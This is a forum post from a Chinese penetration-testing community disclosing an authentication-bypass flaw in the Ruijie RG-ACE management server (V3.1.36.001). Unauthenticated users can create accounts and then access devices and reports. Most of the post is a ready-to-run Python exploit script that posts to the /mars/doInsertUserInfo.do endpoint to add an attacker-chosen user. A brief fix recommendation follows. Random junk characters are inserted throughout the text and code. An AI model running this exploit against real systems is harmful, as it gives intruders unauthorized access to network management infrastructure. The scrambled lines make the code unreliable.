找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2484|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
+ F, Y$ h% G- z7 E+ x( [) e& m; r. t; s, L* Q

4 `0 `7 i% l1 P4 Q& C测试的具体版本是
% V* e1 G5 V& X& A产品名称: 锐捷应用控制引擎
- `; @5 ~1 D- w7 i版本号: 3.1.36.001 TC
( F9 ?. A" f! O+ u: `. C# I编译时间: 201104291730* @$ h) J' D  v

/ U) C5 `+ w% }' \- ~4 ]. m
! \: b, j5 d0 p+ k. K漏洞证明:( c/ Q# `3 _1 z" P
) n1 ]# d) _& t8 L3 h$ t
( I& k$ ^  _/ ~6 L+ ]  E# j6 G
; f2 }! t3 @: t# P; `" Q2 Q# K# x$ W6 v
% G3 @! @/ q; |2 X
& R8 e* g) u- [4 j

3 f' o3 f- K0 m2 y$ d执行脚本
2 ?# t4 ~9 n. Y, e# T; [2 [* @#! /usr/bin/env python1 [! b% C" g/ {, _& X9 T! @) @
#coding=gbk% Q) m- f8 g* I0 t, c9 E5 ]) Q
#RG-ACE管理服务器 V3.1.36.0017 U+ u2 ]5 W2 Q, O9 d
import urllib2, urllib,cookielib
6 H/ J  P( W( _; h% Furl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
( f! N2 O) N9 q% Hopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))# z% x" g4 z% x6 c
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]% v: j% D. c4 q- d1 q- j
post=(("event","userManager.doInsertUserInfo"),
: q. W1 t1 w1 y("useractionname","addButtonValue"),0 }. Q0 }/ W: k' c9 N, a1 Q
("useropermanager","userManager"),! H; {0 F+ r9 w& F1 \/ G
("userName","t"), #######账号自己加& g, l- |  C( a- K6 R0 N
("pwd","aaaaaa"),######密码自己加
8 z; O( B% Y# p7 Q, k; Q("trueName","ad"),4 b' u+ P/ h. p$ ]3 }/ g. N$ ]
("email",""),
9 m/ E. L: n) |("mobilePhone",""),) T/ @3 v) N/ f- g0 R
("officePhone",""),( N' Z; X& [6 a. g! ~
("addr",""),( v) C' w5 @" D( ~
("submit","确定"))% T) q, X, v, K3 |) \3 p# y& @
urllib2.install_opener(opener)
* ~1 w) w# i' o" M0 g2 j. Z0 Cp=urllib2.urlopen(url, urllib.urlencode(post)).read()$ r7 e# f1 d- W1 w0 P
print "Done"' L- H# `3 }0 H9 j4 Q4 h2 V
" ~" B+ f  }1 t7 e+ O% W% Q
登录,连接设备
8 x  ^, S$ s! b* Z/ }' e7 v4 ]6 C% W: n* o6 z  J8 ^! v

. @8 y/ S3 c5 `' G5 h% B; l3 E) w) @+ |5 u- G1 E  q3 m
1 V: A- ]  x1 ^

$ }7 B6 m; J, c默认的管理员admin权限更大点8 D3 H' b9 s/ z; C+ b  Y, I* n% W
' }8 W: N" L; V/ N. u2 Z9 V! A/ Z
) w$ q1 j7 {: }& P) k

7 W  G7 ~9 p! d) F) E7 Y ; ]& ]# k7 `/ q" V. t. O4 h$ m" r

  k2 c/ w* n( Z3 E) E4 {修复方案:
, i7 I: K" c1 D& p/ p; _加强对接口的权限验证
' ^7 ?7 Z- b; Z; B1 ~3 x# Q* O+ X) c/ Q) a
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表